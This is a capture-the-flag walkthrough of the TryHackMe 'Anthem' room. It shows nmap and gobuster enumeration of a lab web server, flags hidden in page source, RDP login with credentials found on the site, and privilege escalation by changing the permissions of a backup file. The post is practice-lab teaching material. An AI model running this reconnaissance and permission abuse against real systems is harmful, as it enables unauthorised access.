In this walk through, we will be going through the Anthem room from Tryhackme. This room is rated as Easy on the platform and consist exploitation of a Windows machine using web enumeration, source code review and Privilege Escalation. So, let’s get started without any delay.
Table of Contents
|Objective||This task involves you, paying attention to details and finding the ‘keys to the castle’.|
Task 1 – Website Analysis
Question 1 – Let’s run nmap and check what ports are open.
sudo nmap -Pn -sS -sV 10.10.175.171
Question 2 – What port is for the web server?
Question 3 – What port is for remote desktop service?
Question 4 – What is a possible password in one of the pages web crawlers check for?
Question 5 – What CMS is the website using?
wh1terose@fsociety:~$ gobuster dir -u http://10.10.175.171/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.175.171/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/05/19 23:13:13 Starting gobuster in directory enumeration mode =============================================================== /Archive (Status: 301) [Size: 118] [--> /] /Blog (Status: 200) [Size: 5399] /RSS (Status: 200) [Size: 1877] /Search (Status: 200) [Size: 3472] /SiteMap (Status: 200) [Size: 1047] /archive (Status: 301) [Size: 123] [--> /blog/] /authors (Status: 200) [Size: 4120] /blog (Status: 200) [Size: 5399] /categories (Status: 200) [Size: 3546] /install (Status: 302) [Size: 126] [--> /umbraco/]
Question 6 – What is the domain of the website?
Question 7 – What’s the name of the Administrator
- Google the poem in the following post – http://10.10.175.171/archive/a-cheers-to-our-it-department/. It reveals the admin name.
Question 8 – Can we find find the email address of the administrator?
- Navigate to the following post, which has a email address in it. The email address constitutes of the user’s name first and last syllable.
Task 2 – Spot the flags
Our beloved admin left some flags behind that we require to gather before we proceed to the next task..
Question 1 – What is flag 1?
- View the source code of “We are hiring” article. There, search for “meta”. You will find your flag.
Question 2 – What is flag 2?
- View Source on the webiste home page.
Question 3 – What is flag 3?
- Navigate to the following directory which was revealed at the directory bruteforing section – http://10.10.175.171/authors
Question 4 – What is flag 4?
- View the source code of “A cheers to our IT department” article. There, search for “meta”. You will find your flag.
Task 3 – Final stage
Let’s get into the box using the intel we gathered.
Question 1 – Let’s figure out the username and password to log in to the box.(The box is not on a domain)
- Use Reminna and following credentials to RDP into the server.
Question 2 – Gain initial access to the machine, what is the contents of user.txt?
Question 3 – Can we spot the admin password?
- Found a folder named backup in C:\backup. Tried to open the file restore but faced a permission error. Let’s troubleshoot it.
- First right click on the file and got to properties. Then select the security tab. Further, click on Edit and search our username -SG. Click apply and confirm the changes.
- Open up the file gives us the admin password.
Question 4 – Escalate your privileges to root, what is the contents of root.txt?
- Use the following credentials to RDP into the server as an admin.
Also Read: Tryhackme – Wonderland
So that was “Anthem” for you. We started off with a regular nmap scan and found two ports opened – 80 (HTTP) and 3389 (RDP). Next, found a potential password in robots.txt. Following that, performed a gobuster scan to reveal some directories. The result consist of /install directory which confirms umbraco CMS running on the system. Got the domain name in the page footer and used Google to figure out the admin name and email address. Moving on to the next section, captured 4 flags that was hidden in the page source codes of various part of the website. At last, got into the machine using RDP and then escalated the privileges by exploiting permissions in the backup folder which gives us our user and root flag. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.